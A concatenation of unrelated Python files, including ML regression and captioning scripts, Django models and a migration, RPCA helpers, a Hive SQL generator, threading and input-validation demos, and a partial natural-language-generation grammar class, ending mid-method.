headers = df.columns[0:61]
#remove recent news (less than 2 months)
df = df[df[' timedelta'] > 60]
#Conduct PCA
data=df[df.columns[2:60]]
target = df[' shares'].ravel()
data_norm = StandardScaler().fit_transform(data)
network = architectures.mixture_of_experts([
layers.join(
layers.Input(58),
layers.Softmax(22),
layers.Softmax(1),
),
layers.join(
layers.Input(58),
layers.Relu(60),
layers.Relu(40),
layers.Softmax(22),
layers.Softmax(1),
),
layers.join(
layers.Input(58),
layers.Tanh(12),
layers.Tanh(25),
layers.Tanh(1),
),
])
network
gdnet = algorithms.Adam(network, verbose=True)
gdnet.fit(data_norm,target, epochs=500)
predicted = cross_val_predict(gdnet, data_norm, target, cv=5)
error = estimators.rmse(target, predicted)
print("MOE RMSE = {}\n".format(error))
r2_score = metrics.r2_score(target, predicted)
print("MOE R_SCORE = {}\n".format(r2_score))
|
#!/usr/bin/python
import os
import sys
import asyncore, socket
import threading
import time
import Queue
import random
run = True
def handle_message(message):
outfile = '/tmp/message_handler_file'
with open(outfile, 'a') as f:
f.write('%s\n' % message)
return
class Consumer(threading.Thread):
__QUEUE_TIMEOUT = 5
def __init__(self, q, *args, **kwargs):
super(self.__class__, self).__init__(*args, **kwargs)
self.__queue = q
def run(self):
global run
while run:
message = None
try:
message = self.__queue.get(block=True, timeout=self.__class__.__QUEUE_TIMEOUT)
except Queue.Empty:
continue
worker = threading.Thread(target=handle_message, args=(message,))
worker.daemon = True
worker.start()
print "[Thread %s] is leaving" % self.getName()
class RandomProducer(threading.Thread):
__MESSAGES = [
'Caution: breathing may be hazardous to your health.',
'Your love life will be... interesting.',
'Always do right. This will gratify some people and astonish the rest.',
'Always the dullness of the fool is the whetstone of the wits.',
'Good day to deal with people in high places; particularly lonely stewardesses.',
'It\'s lucky you\'re going so slowly, because you\'re going in the wrong direction.',
]
def __init__(self, q, *args, **kwargs):
super(self.__class__, self).__init__(*args, **kwargs)
self.__queue = q
@classmethod
def get_sleep_time(c, minimum=1, maximum=5):
return random.randint(minimum, maximum)
@classmethod
def gen_message(c):
return c.__MESSAGES[random.randint(0, len(c.__MESSAGES) - 1)]
def run(self):
global run
while run:
queue = self.__queue
time.sleep(RandomProducer.get_sleep_time())
try:
m = RandomProducer.gen_message()
queue.put(m, block=False)
except Exception as e:
pass
print "[Thread %s] is leaving" % self.getName()
def main():
global run
q = Queue.Queue(maxsize=0)
producer = RandomProducer(q, name='producer')
producer.daemon = True
producer.start()
consumer = Consumer(q, name='consumer')
consumer.daemon = True
consumer.start()
try:
while True:
time.sleep(60)
except KeyboardInterrupt as e:
run = False
consumer.join()
producer.join()
return 0
if __name__ == "__main__":
main()
|
import pytest
from contextlib import ExitStack as does_not_raise
import math
class Solution:
def get_num_open(self, n):
"""
Given a number of lockers, n, get the number of open lockers after they have been
cycled in multiples of 1-n.
Only perfect squares will be left, so calculate the floor of sqrt(n)
:param n: Number of lockers
:return: The number left open
"""
return math.floor(math.sqrt(n))
@staticmethod
def simulate(n):
lockers = [0]*n # start closed
for i in range(n):
for j in range(i, n, i+1):
lockers[j] ^= 1 # cycle
return sum(lockers)
testdata = [
((100,), 10, does_not_raise()),
((100,), Solution.simulate(100), does_not_raise()),
((10,), Solution.simulate(10), does_not_raise()),
((1000,), Solution.simulate(1000), does_not_raise()),
((2491,), Solution.simulate(2491), does_not_raise()),
]
@pytest.mark.parametrize("args, res, expectation", testdata)
def test_solution(args, res, expectation):
with expectation:
s = Solution()
assert s.get_num_open(*args) == res
if __name__ == '__main__':
pytest.main(args=[__file__])
|
from django.db import models
class kind(models.Model):
name = models.CharField(max_length=200,help_text="enter a furniture kind: ")
def __str__(self):
return self.name
class furniture(models.Model):
title = models.CharField(max_length=200)
kind = models.ManyToManyField(kind,help_text="select a kind for this furniture: ")
brand = models.ForeignKey('Brand',on_delete=models.SET_NULL, null=True)
pic = models.ImageField(blank = True,null=True,upload_to='furniture/%Y%m%d')
slug = models.SlugField(max_length = 100,unique = True,null=True)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('furniture-details',args=[self.id,self.slug])
class Meta:
ordering=('title',)
index_together=(('id','slug'),)
class Brand(models.Model):
name = models.CharField(max_length=200,help_text='enter a furniture brand: ')
def __str__(self):
return self.name
class furniture_detail_photos(models.Model):
furniture = models.OneToOneField('furniture',on_delete=models.CASCADE)
file = models.FileField(upload_to='files/%Y%m%d',null=True,blank=True)
def __str__(self):
return self.furniture
# Create your models here.
|
"""This file contains the helper RPCA function which calculate the rank and
sparsity of the outputs."""
import numpy as np
def get_rank(matrix, sigma):
"""This function returns the rank of the input matrix, D using its
singular values D_sigma."""
if not (matrix.ndim == 2):
raise Exception('Input is not 2D. Check dimensions of imput matrix')
elif not (sigma.ndim == 1):
raise Exception('Input sigma is not 1D. Check dimensions of imput matrix')
elif np.isnan(matrix).any():
raise Exception('There are NaNs in the matrix')
elif np.isnan(sigma).any():
raise Exception('There are NaNs in the sigma values')
dim_one, dim_two = matrix.shape
beta = min(dim_one, dim_two)/max(dim_one, dim_two)
win = (8*beta)/(beta + 1 + (beta**2 +14*beta + 1)**(1/2))
tau = (2*(beta + 1) + win)**(1/2)
ind = sigma > tau
rank = ind.sum()
if isinstance(rank, np.int64) is not True:
raise Exception('Value returned is not of type int')
return rank
def get_sparsity(matrix, tolerance=0.001):
"""This function returns the fraction of elements
that are zero in D with the tolerance, tol."""
if not (matrix.ndim == 2):
raise Exception('Input is not 2D. Check dimensions of imput matrix')
elif np.isnan(matrix).any():
raise Exception('There are NaNs in your matrix')
percent_sparse = int(np.round(100*(abs(matrix) < tolerance).sum()/matrix.size))
if isinstance(percent_sparse, int) is not True:
raise Exception('Value returned is not of type int')
return percent_sparse
def magnitude(U,V):
if not (U.shape == V.shape):
raise Exception('The velocities must have the same shape')
# test if the two are the same size
mag = (U**2 + V**2)**(.5)
return mag
def vorticity(U,V):
if not (U.shape == V.shape):
raise Exception('The velocities must have the same shape')
m,n,k = V.shape
vort = np.empty([m,n,k])
for frames in range(k):
# take derivative with respect to y axis (1)
du_dy = np.gradient(U[:,:,frames], axis = 1)
# take derivative with respect to x axis (0)
dv_dx = np.gradient(V[:,:,frames], axis = 0)
vort[:,:,frames] = dv_dx-du_dy
return vort
def convert_lambda(slider_value):
return 10**(slider_value-1)
|
import numpy as np
import pandas as pd
from math import floor
import os
from gensim.models import Word2Vec
from tqdm import tqdm
import tensorflow as tf
from class_model_vari import video2seq
import sys
### prepare directory path
test_path = sys.argv[1].rstrip('/')
output_path = sys.argv[2].rstrip('/')
#### load testing data
test_data = {}
testlist = os.popen('ls '+test_path+'/feat/').read().split()
## import testing data
print('Start loading testing data ...')
index_id = []
for index, fi in tqdm(enumerate(testlist)):
index_id.append(fi.rstrip('.npy'))
test_data[fi.rstrip('.npy')] = np.load(test_path + '/feat/' + fi)
w2vec_model = Word2Vec.load('./dicts/w2vec.model')
dicts_size = len(w2vec_model.wv.vocab) + 1
max_seq_length = 27
batch_size = len(test_data)
model = video2seq(dicts_size, max_seq_length, batch_size, 0.6)
model.build_model()
model.build_encoder()
model.build_decoder()
checkpoint_dir = './models/'
saver = tf.train.Saver()
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
saver.restore(sess, ckpt.model_checkpoint_path)
video_in = np.array([test_data[ii] for ii in index_id])
video_in.reshape(batch_size, 80, 4096)
model.input_test_data(video_in)
test_index = model.run_test(sess)
result = []
for sentence in test_index:
cc = ''
early_word = 'BOS'
for indexx in sentence:
if indexx == 2:
break
else:
word_now = w2vec_model.wv.index2word[int(indexx-1)]
if word_now != early_word:
cc = cc + ''.join(word_now) + ' '
#print(early_word, ' ', word_now)
early_word = word_now
else:
pass
result.append(cc)
import csv
out = []
for i in range(len(index_id)):
out.append([index_id[i], result[i]])
filename = output_path
with open(filename, 'w+') as f:
s = csv.writer(f, delimiter=',', lineterminator='\n')
for i in range(len(out)):
s.writerow(out[i])
print('Done')
|
import copy
from core.HqlParse import HqlParse
import re
import datetime
def convert2mysql_type(value,index):
result = value
if value.upper() == "STRING" and index < 70:
result = 'varchar(255)'
elif value.upper() == "STRING" and index > 70:
result = 'TEXT'
return result
def my_format(column_name, coumn_type, comment):
mcolumn = column_name + str('\t' * (6 - (len(column_name) + 1) // 4))
return ',{0}\t{1}\tCOMMENT\t{2}'.format(mcolumn, coumn_type, comment)
def my_format2(column_name, coumn_type, comment):
mcolumn = column_name + str('\t' * (6 - (len(column_name) + 2) // 4))
return '{0}\t--{2}'.format(mcolumn, coumn_type, comment)
def my_format3(column):
column_name = column.split('--')[0].strip()
comment = column.split('--')[1].strip()
mcolumn = column_name + str('\t' * (6 - (len(column_name) + 1) // 4))
return '{0}\t--{1}'.format(mcolumn, comment)
class SQLBuilder(object):
def __init__(self, sql_statement):
self._tables = []
# 生成检测数据发散的SQL脚本
def repeat_judge(self,sql_statement):
sql_statement.replace('`','')
parse = HqlParse(sql_statement)
insert_info = parse.insert_info
str_list = ['set hive.mapred.mode=strict;']
for stmt in insert_info:
tokens = stmt['sub_tables'][1:]
idx = 1
for token in tokens:
table_alias = token['table']['table_alias']
res_columns = []
table_name = token['table']['table_name']
# print(token['res'][0].split(table_alias)[1])
for res in token['res']:
res_column = re.findall(r'\.?(\w+)\s*?', res.split(table_alias)[1], re.S | re.I)[0]
res_columns.append(res_column)
str = '''
SELECT
"{0}",*
FROM (
SELECT
{1}
,COUNT(1) OVER(PARTITION BY {1}) AS ct
FROM {2}
) {0} WHERE {0}.ct > 1;
'''.format(table_alias, ",".join(res_columns), table_name)
#print(str)
str_list.append(str)
return '\n'.join(str_list)
# 构建测试报告脚本
def build_test_sql(self, sql_statement):
parse = HqlParse(sql_statement)
insert_info = parse.insert_info[0]
target_table_name = insert_info['target_table_name']
main_table_name = insert_info['sub_tables'][0]['table']['table_name']
sql_list = []
# 检验乱码
sql_list.append('SELECT * FROM {0} LIMIT 500;'.format(target_table_name))
sql_list.append('''SELECT "T1",COUNT(1) FROM {0}
UNION ALL
SELECT "T2",COUNT(1) FROM {1};
'''.format(target_table_name,main_table_name))
# show table
sql_list.append('show create table {0};'.format(target_table_name))
return '\n'.join(sql_list)
# Hive 表转 MySQL 表
def hive2Mysql(self,sql_statement):
parse = HqlParse(sql_statement)
tables = parse.tables
table_str = ''
for table in tables:
tablename = table['table_name'][table['table_name'].rfind('.') + 1:]
columns = []
table_comment = table['table_comment']
index = 1
for column in table['definitions']:
# 字段名
column_name = column[0].value
# 字段类型
coumn_type = convert2mysql_type(column[1].value,index)
index += 1
# 字段注释
comment = column[3].value
columns.append(my_format(column_name, coumn_type, comment))
columns[0] = columns[0].replace(',','\t')
table_str += """
CREATE TABLE IF NOT EXISTS {0} (
{1}
)COMMENT '{2}'
;
""".format(tablename,"\n\t".join(columns),table_comment)
return table_str
# 多表联合字段去重
def column_dumplicate(self, sql_statement,hostname,now):
parse = HqlParse(sql_statement)
tables = parse.tables
columns = {}
index = 1
columns_comment = []
table_dic = {}
for table in tables:
tablename = table['table_name']
tablecomment = table['table_comment']
alias_columns = []
for column in table['definitions']:
# 字段名
column_name = column[0].value
# 字段类型
coumn_type = column[1].value
# 字段注释
comment = column[3].value
m_column = my_format(column_name, coumn_type, comment)
m_column__ = [column_name, my_format2(column_name, coumn_type, comment)]
columns[column_name] = m_column
alias_columns.append(m_column__)
table_dic['t' + str(index)] = {'columns':alias_columns,'tablename':tablename,'tablecomment':tablecomment}
index += 1
# 表字段去重
# TODO 适配 ` 号
dump_keys = []
for key in table_dic.keys():
# 每张表与前面的表比对去重 删掉自己的重复的
c1 = table_dic[key]['columns']
c1_new = []
if len(dump_keys) == 0:
for c in c1:
c1_new.append(c[0])
dump_keys = copy.deepcopy(c1_new)
continue
for c in c1:
if c[0] not in dump_keys:
c1_new.append([c[0],c[1]])
dump_keys.append(c[0])
table_dic[key]['columns'] = list(c1_new)
sub_table_str = []
flag = 0
for key in table_dic.keys():
sub_table_columns = []
# 添加数据
for co in table_dic[key]['columns']:
# SELECT
columns_comment.append(my_format3('{0}.{1}'.format(key,co[1].strip())))
# 子表的columns
sub_table_columns.append(co[1].strip())
#print('\n'.join(sub_table_columns),table_dic[key]['tablename'])
if not flag:
ss = """ (
select
{0}
from {1} -- min_size: comment:{3}
-- where ds = ' '
) {2}
""".format('\n\t\t ,'.join(sub_table_columns), table_dic[key]['tablename'], key,table_dic[key]['tablecomment'])
flag = 1
else:
ss = """LEFT JOIN(
select
{0}
from {1} -- min_size: comment: {3}
-- where ds = ' '
) {2}
ON
""".format('\n\t\t ,'.join(sub_table_columns), table_dic[key]['tablename'], key,table_dic[key]['tablecomment'])
sub_table_str.append(ss)
columns_values = list(columns.values())
columns_values[0] = columns_values[0].replace(',', '\t')
columns_str = '\n \t'.join(columns_values)
columns_comment[0] = '\t' + str(columns_comment[0])
columns_comment_str = '\n\t,'.join(list(columns_comment))
final = """----------------------------------------------
-- @ Output:db_name.table_name
-- @ Desc:{5}
-- @ Primary Key:
-- @ Author:{3}
-- @ Create Time:{4}
-- @ Modify Time:({3},{4},创建表)
-- @ Comment:{5}
----------------------------------------------
CREATE TABLE IF NOT EXISTS XXXXX (
{0}
\t,etl_time timestamp COMMENT 'etl_time'
)COMMENT '{5}'
-- 要不要分区?partitioned by (ds string)
ROW FORMAT DELIMITED STORED AS orc TBLPROPERTIES('orc.compression'='SNAPPY')
;
-- 分区检查
set hive.mapred.mode = strict;
insert overwrite table XXXXXX 分区?partition(ds = ' ' )
SELECT
{1}
\t,current_timestamp as etl_time
from
{2}
""".format(columns_str, columns_comment_str, '\n'.join(sub_table_str), hostname, now,table_dic['t1']['tablecomment'])
final += '\n;'
return final
def column_none_dumplicate(self, sql_statement, hostname, now):
parse = HqlParse(sql_statement)
tables = parse.tables
columns = {}
index = 1
columns_comment = []
table_dic = {}
for table in tables:
tablename = table['table_name']
tablecomment = table['table_comment']
alias_columns = []
for column in table['definitions']:
# 字段名
column_name = column[0].value
# 字段类型
coumn_type = column[1].value
# 字段注释
comment = column[3].value
m_column = my_format(column_name, coumn_type, comment)
m_column__ = [column_name, my_format2(column_name, coumn_type, comment),m_column]
#columns[column_name] = m_column
alias_columns.append(m_column__)
table_dic['t' + str(index)] = {'columns': alias_columns, 'tablename': tablename,
'tablecomment': tablecomment}
index += 1
# 表字段去重
# TODO 适配 ` 号
dump_keys = []
for key in table_dic.keys():
# 每张表与前面的表比对去重 如果有重复的就加前缀
c1 = table_dic[key]['columns']
c1_new = []
c1_columns = []
if len(dump_keys) == 0:
for c in c1:
c1_new.append(c[0])
c1_columns.append([c[0],c[1],c[1]])
columns[c[0]] = c[2]
dump_keys = copy.deepcopy(c1_new)
table_dic[key]['columns'] = list(c1_columns)
continue
for c in c1:
if c[0] not in dump_keys:
c1_new.append([c[0],c[1],c[1]])
dump_keys.append(c[0])
columns[c[0]] = c[2]
else:
tablename = table_dic[key]['tablename'][table_dic[key]['tablename'].rfind('.')+1:]
tablename = re.sub(r'\w+_\w+_(\w+)_\w+', r'\1',tablename, flags=re.M | re.I | re.S)
new_cname = '{0}_{1}'.format(tablename,c[0])
new_cname_all = '{0} as {1}'.format(c[0],str(c[1]).replace(c[0],new_cname))
c1_new.append([new_cname,new_cname_all,c[1]])
dump_keys.append(new_cname)
columns[new_cname] = c[2].replace(c[0],new_cname)
table_dic[key]['columns'] = list(c1_new)
sub_table_str = []
flag = 0
for key in table_dic.keys():
sub_table_columns = []
# 添加数据
for co in table_dic[key]['columns']:
# SELECT
columns_comment.append(my_format3('{0}.{1}'.format(key, co[1].strip())))
# 子表的columns
sub_table_columns.append(co[2].strip())
# print('\n'.join(sub_table_columns),table_dic[key]['tablename'])
if not flag:
ss = """ (
select
{0}
from {1} -- min_size: comment:{3}
-- where ds = ' '
) {2}
""".format('\n\t\t ,'.join(sub_table_columns), table_dic[key]['tablename'], key,
table_dic[key]['tablecomment'])
flag = 1
else:
ss = """LEFT JOIN(
select
{0}
from {1} -- min_size: comment: {3}
-- where ds = ' '
) {2}
ON
""".format('\n\t\t ,'.join(sub_table_columns), table_dic[key]['tablename'], key,
table_dic[key]['tablecomment'])
sub_table_str.append(ss)
columns_values = list(columns.values())
columns_values[0] = columns_values[0].replace(',', '\t')
columns_str = '\n \t'.join(columns_values)
columns_comment[0] = '\t' + str(columns_comment[0])
columns_comment_str = '\n\t,'.join(list(columns_comment))
final = """----------------------------------------------
-- @ Output:db_name.table_name
-- @ Desc:{5}
-- @ Primary Key:
-- @ Author:{3}
-- @ Create Time:{4}
-- @ Modify Time:({3},{4},创建表)
-- @ Comment:{5}
----------------------------------------------
CREATE TABLE IF NOT EXISTS XXXXX (
{0}
\t,etl_time timestamp COMMENT 'etl_time'
)COMMENT '{5}'
-- 要不要分区?partitioned by (ds string)
ROW FORMAT DELIMITED STORED AS orc TBLPROPERTIES('orc.compression'='SNAPPY')
;
-- 分区检查
set hive.mapred.mode = strict;
insert overwrite table XXXXXX 分区?partition(ds = ' ' )
SELECT
{1}
\t,current_timestamp as etl_time
from
{2}
""".format(columns_str, columns_comment_str, '\n'.join(sub_table_str), hostname, now,
table_dic['t1']['tablecomment'])
final += '\n;'
return final
# 查询语句批量生成
def select_generate(self,sql_statement,query):
parse = HqlParse(sql_statement)
tables = parse.tables
columns_comment = []
table_str = ''
for table in tables:
tablename = table['table_name']
tablecomment = table['table_comment']
columns = []
for column in table['definitions']:
# 字段名
column_name = column[0].value
# 字段类型
coumn_type = column[1].value
# 字段注释
comment = column[3].value
columns.append(query.format(column_name))
#columns[0] = columns[0][columns[0].find(',')+1:]
partition = parse.get_partition_col(sql_statement)
if partition:
today = datetime.datetime.now()
yesterday = today - datetime.timedelta(days=1)
yesterday = yesterday.strftime('%Y%m%d')
table_str += "SELECT {0} \n FROM {1} \n WHERE {2} = \'{3}\';\n".format('\n,'.join(columns), tablename,partition,yesterday)
else:
table_str += "SELECT {0} FROM {1};\n".format('\n,'.join(columns),tablename)
return table_str
# 多表组合union
def table_union(self, sql_statement, hostname, now):
sql_statement = sql_statement.replace('`', '')
sql_statement = sql_statement.replace('"', '')
parse = HqlParse(sql_statement)
tables = parse.tables
columns = {}
index = 1
columns_comment = []
table_dic = {}
for table in tables:
tablename = table['table_name']
tablecomment = table['table_comment']
alias_columns = []
for column in table['definitions']:
# 字段名
column_name = column[0].value
# 字段类型
coumn_type = column[1].value
# 字段注释
comment = column[3].value
m_column = my_format(column_name, coumn_type, comment)
m_column__ = [column_name, my_format2(column_name, coumn_type, comment)]
columns[column_name] = m_column
alias_columns.append(m_column__)
table_dic['t' + str(index)] = {'columns': alias_columns, 'tablename': tablename,
'tablecomment': tablecomment}
index += 1
# 表字段去重
# TODO 适配 ` 号
dump_keys = []
for key in table_dic.keys():
# 每张表与前面的表比对去重 删掉自己的重复的
c1 = table_dic[key]['columns']
c1_new = []
if len(dump_keys) == 0:
for c in c1:
c1_new.append(c[0])
dump_keys = copy.deepcopy(c1_new)
continue
for c in c1:
if c[0] not in dump_keys:
c1_new.append([c[0], c[1]])
dump_keys.append(c[0])
# table_dic[key]['columns'] = list(c1_new)
#print(dump_keys)
sub_table_str = []
flag = 0
for key in table_dic.keys():
sub_table_columns = []
table_columns_key = []
for co in table_dic[key]['columns']:
# SELECT
columns_comment.append(co[1].strip())
# 子表的columns
table_columns_key.append(co[0].strip())
# 添加数据
for column in dump_keys:
if column not in table_columns_key:
sub_table_columns.append("NULL AS {0}".format(column))
else:
sub_table_columns.append(column)
if not flag:
ss = """
select
{0}
\t,current_timestamp as etl_time
from {1} -- min_size: comment:{3}
where ds = '{4}'""".format('\n\t\t ,'.join(sub_table_columns), table_dic[key]['tablename'], key,
table_dic[key]['tablecomment'],'${bdp.system.bizdate}')
flag = 1
else:
ss = """
UNION ALL
select
{0}
\t,current_timestamp as etl_time
from {1} -- min_size: comment: {3}
where ds = '{4}'""".format('\n\t\t ,'.join(sub_table_columns), table_dic[key]['tablename'], key,
table_dic[key]['tablecomment'],'${bdp.system.bizdate}')
sub_table_str.append(ss)
columns_values = list(columns.values())
columns_values[0] = columns_values[0].replace(',', '\t')
columns_str = '\n \t'.join(columns_values)
columns_comment[0] = '\t' + str(columns_comment[0])
columns_comment_str = '\n\t,'.join(list(columns_comment))
final = """----------------------------------------------
-- @ Output:db_name.table_name
-- @ Desc:{5}
-- @ Primary Key:
-- @ Author:{3}
-- @ Create Time:{4}
-- @ Modify Time:({3},{4},创建表)
-- @ Comment:{5}
----------------------------------------------
CREATE TABLE IF NOT EXISTS XXXXX (
{0}
\t,etl_time timestamp COMMENT 'etl_time'
)COMMENT '{5}'
partitioned by (ds string)
ROW FORMAT DELIMITED STORED AS orc TBLPROPERTIES('orc.compression'='SNAPPY')
;
-- 分区检查
set hive.mapred.mode = strict;
insert overwrite table XXXXXX partition(ds = '{6}')
{2}
""".format(columns_str, columns_comment_str, '\n'.join(sub_table_str), hostname, now,
table_dic['t1']['tablecomment'],'${bdp.system.bizdate}')
final += '\n;'
return final
SQL = """create external table hive_ods.ods_order_info (
id string COMMENT '订单号',
final_total_amount decimal(10,2) COMMENT '订单金额',
order_status string COMMENT '订单状态',
user_id string COMMENT '用户 id',
out_trade_no string COMMENT '支付流水号',
create_time string COMMENT '创建时间',
operate_time string COMMENT '操作时间',
province_id string COMMENT '省份 ID',
benefit_reduce_amount decimal(10,2) COMMENT '优惠金额',
original_total_amount decimal(10,2) COMMENT '原价金额',
feight_fee decimal(10,2) COMMENT '运费'
) COMMENT '订单表'
PARTITIONED BY (dt string)
;
create external table hive_ods.ods_order_detail(
id string COMMENT '订单编号',
order_id string COMMENT '订单号',
user_id string COMMENT '用户 id',
sku_id string COMMENT '商品 id',
sku_name string COMMENT '商品名称',
order_price decimal(10,2) COMMENT '商品价格',
sku_num bigint COMMENT '商品数量',
create_time string COMMENT '创建时间'
) COMMENT '订单详情表'
PARTITIONED BY (dt string);
"""
sql_builder = SQLBuilder(SQL)
print(sql_builder.table_union(SQL,hostname='gw11',now='20210605'))
|
# Generated by Django 3.1.7 on 2021-04-05 20:17
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('address', '0005_auto_20210405_1717'),
('core', '0004_auto_20210405_1706'),
]
operations = [
migrations.AlterField(
model_name='touristattraction',
name='address',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='address.addres'),
),
]
|
def leiaInt(msg):
while True:
try:
n = int(input(msg))
except (ValueError, TypeError):
print('ERRO: por favor, digite um número do menu.')
continue
except KeyboardInterrupt:
print('Usuário preferiu não digitar esse número.')
return 0
else:
return n
def leiaReal(msg):
while True:
try:
n = float(input(msg))
except (ValueError, TypeError):
print('ERRO: por favor, digite um número real válido')
continue
except KeyboardInterrupt:
print('Usuário preferiu não digitar esse número.')
return 0
else:
return n
i = leiaInt('Digite um número: ')
r = leiaReal('Digite um número: ')
print(f'Você digitou o número inteiro {i} e o número real {r}') |
import json
import random
class Productionist(object):
"""A production system for in-game natural language generation from an Expressionist grammar.
Objects of this class operate over a probabilistic context-free generative grammar exported by
Expressionist according to requests originating from a game system. As such, it can be thought of
as an interface between the game engine and an Expressionist grammar.
Subclasses inherit the base functionality of this class, but instantiate their own nuances
pertaining to the specific generation tasks that they carry out (e.g., dialogue generation
vs. thought generation). Most often, these concerns will bear out in the specific mark-up
including in the Expressionist grammars that they operate over.
"""
def __init__(self, game, debug=False):
"""Initialize a Productionist object."""
self.game = game
self.debug = debug
if self.__class__ is DialogueGenerator:
path_to_json_grammar_specification = game.config.path_to_dialogue_nlg_json_grammar_specification
else:
path_to_json_grammar_specification = game.config.path_to_thought_nlg_json_grammar_specification
self.nonterminal_symbols = self._init_parse_json_grammar_specification(
path_to_json_grammar_specification=path_to_json_grammar_specification
)
self._init_resolve_symbol_references_in_all_production_rule_bodies()
self._init_attribute_backward_chaining_and_forward_chaining_rules_to_symbols()
# This method is used to collect all the nonterminal symbols that were expanded
# in the production of a terminal derivation, which reified LineOfDialogue and
# Thought objects will need in order to inherit all the mark-up of these symbols
self.symbols_expanded_to_produce_the_terminal_derivation = set()
def _init_parse_json_grammar_specification(self, path_to_json_grammar_specification):
"""Parse a JSON grammar specification exported by Expressionist to instantiate symbols and rules."""
# Parse the JSON specification to build a dictionary data structure
symbol_objects = []
grammar_dictionary = json.loads(open(path_to_json_grammar_specification).read())
nonterminal_symbol_specifications = grammar_dictionary['nonterminals']
for tag, nonterminal_symbol_specification in nonterminal_symbol_specifications.iteritems():
top_level = nonterminal_symbol_specification['deep']
production_rules_specification = nonterminal_symbol_specification['rules']
raw_markup = nonterminal_symbol_specification['markup']
nonterminal_symbol_class_to_use = (
DialogueNonterminalSymbol if self.__class__ is DialogueGenerator else ThoughtNonterminalSymbol
)
symbol_object = nonterminal_symbol_class_to_use(
tag=tag, top_level=top_level, raw_markup=raw_markup,
production_rules_specification=production_rules_specification
)
symbol_objects.append(symbol_object)
return symbol_objects
def _init_resolve_symbol_references_in_all_production_rule_bodies(self):
"""Resolve all symbol references in production rule bodies to point to actual symbol objects."""
for symbol in self.nonterminal_symbols:
for rule in symbol.production_rules:
self._init_resolve_symbol_references_in_a_rule_body(production_rule=rule)
def _init_resolve_symbol_references_in_a_rule_body(self, production_rule):
"""Resolve all symbol references in the body of this rule to point to actual NonterminalSymbol objects."""
rule_body_specification = list(production_rule.body_specification)
rule_body_with_resolved_symbol_references = []
for symbol_reference in rule_body_specification:
if symbol_reference[:2] == '[[' and symbol_reference[-2:] == ']]':
# We've encountered a reference to a nonterminal symbol, so we need to resolve this
# reference and append to the list that we're building the nonterminal symbol itself
symbol_tag = symbol_reference[2:-2]
symbol_object = next(symbol for symbol in self.nonterminal_symbols if symbol.tag == symbol_tag)
rule_body_with_resolved_symbol_references.append(symbol_object)
else:
# We've encountered a terminal symbol, so we can just append this string itself
# to the list that we're building
rule_body_with_resolved_symbol_references.append(symbol_reference)
production_rule.body = rule_body_with_resolved_symbol_references
def _init_attribute_backward_chaining_and_forward_chaining_rules_to_symbols(self):
"""Attribute to symbols their backward-chaining rules and forward-chaining rules.
A backward-chaining rule of a symbol is a production rule whose body (i.e., right-hand
side) the symbol appears in. A forward-chaining rule of a symbol is then a production rule
whose head (i.e., left-hand side) *is* that symbol.
"""
# Collect all production rules specified in the grammar
all_production_rules_in_the_grammar = []
for nonterminal_symbol in self.nonterminal_symbols:
for production_rule in nonterminal_symbol.production_rules:
all_production_rules_in_the_grammar.append(production_rule)
# Attribute to each symbol its backward-chaining and forward-chaining rules
for rule in all_production_rules_in_the_grammar:
rule.head.forward_chaining_rules.append(rule)
for symbol in rule.body:
if isinstance(symbol, NonterminalSymbol):
symbol.backward_chaining_rules.append(rule)
def target_markup(self, markup_lambda_expression, symbol_sort_evaluation_function, state, rule_evaluation_metric):
"""Attempt to construct a line of dialogue that would perform the given dialogue move.
This act of dialogue construction is rendered as a search task over the tree specified
by a grammar authored in Expressionist. Specifically, we target individual symbols that
are annotated as performing the desired dialogue move, attempting to successfully
terminally backward-chain (i.e., follow production rules *backward* until we reach a
top-level symbol) and successfully terminally forward-chain (i.e., follow production
rules *forward* until we reach an expansion containing no nonterminal symbols). The
notion of success here is articulated by the Conversation object that calls this method,
but generally it will constrain this search procedure such that no symbol with
unsatisfied preconditions (given the state of the conversation/world, which we have
access to via the Conversation object's attributes) may be expanded at any point.
@param markup_lambda_expression: A lambda expression whose sole argument is a nonterminal symbol and
that returns True if the nonterminal symbol has the desired markup.
@param symbol_sort_evaluation_function: A lambda expression that can be used for the 'key' keyword argument
in the call to sort a list of viable nonterminal symbols (i.e., ones
that have the desired markup). This allows us to iterate over viable
symbols in order of appeal.
@param state: An object representing the state that symbol preconditions should be checked against in
order to potentially expand the given symbol.
@param rule_evaluation_metric: A lambda expression that determines the probability of application associated
with each of a symbol's production rules; this allows us to probabilistically
target production rules when we're doing forward- and backward-chaining
"""
# Collect all satisficing symbols, i.e., ones have the desired markup and
# thus satisfy the given markup_lambda_expression
satisficing_symbols = [s for s in self.nonterminal_symbols if markup_lambda_expression(s)]
# Randomly shuffle these symbols, which will mean that ties in the sort we are about
# to do will be ordered differently across different generation instances
random.shuffle(satisficing_symbols)
# Sort this list according to the given symbol_sort_lambda_expression (for
# dialogue, this will be simply produce a random sort)
satisficing_symbols.sort(key=lambda ss: symbol_sort_evaluation_function(ss), reverse=True)
# Iteratively attempt to successfully build a line of dialogue by backward-chaining
# and forward-chaining from this symbol
for symbol in satisficing_symbols:
raw_derivation_built_by_targeting_this_symbol = self._target_symbol(
symbol=symbol, state=state, rule_evaluation_metric=rule_evaluation_metric, n_tabs=0
)
if raw_derivation_built_by_targeting_this_symbol: # Will be None if targeting was unsuccessful
return raw_derivation_built_by_targeting_this_symbol
self._reset_temporary_attributes()
if self.debug:
print "Productionist could not generate a derivation satisfying the expression {}".format(
markup_lambda_expression
)
print "Here's all the satisficing symbols it attempted to begin from, along with their preconditions:"
for symbol in satisficing_symbols:
print "\t{}".format(symbol)
for precondition in symbol.preconditions:
print "\t\t{}".format(precondition)
def _target_symbol(self, symbol, state, rule_evaluation_metric, n_tabs):
"""Attempt to successfully terminally backward-chain and forward-chain from this symbol.
If successful, this method will return a LineOfDialogue object, which is a templated
line of dialogue that may be filled in and deployed during a conversation. If this
method fails at any point, it will immediately return None.
"""
if self.debug:
print "{}Targeting symbol {}...".format(' '*n_tabs, symbol)
# Attempt forward chaining first
partial_raw_template_built_by_forward_chaining = self._forward_chain_from_symbol(
symbol=symbol, state=state, n_tabs=n_tabs, rule_evaluation_metric=rule_evaluation_metric,
symbol_is_the_targeted_symbol=True
)
if not partial_raw_template_built_by_forward_chaining:
if self.debug:
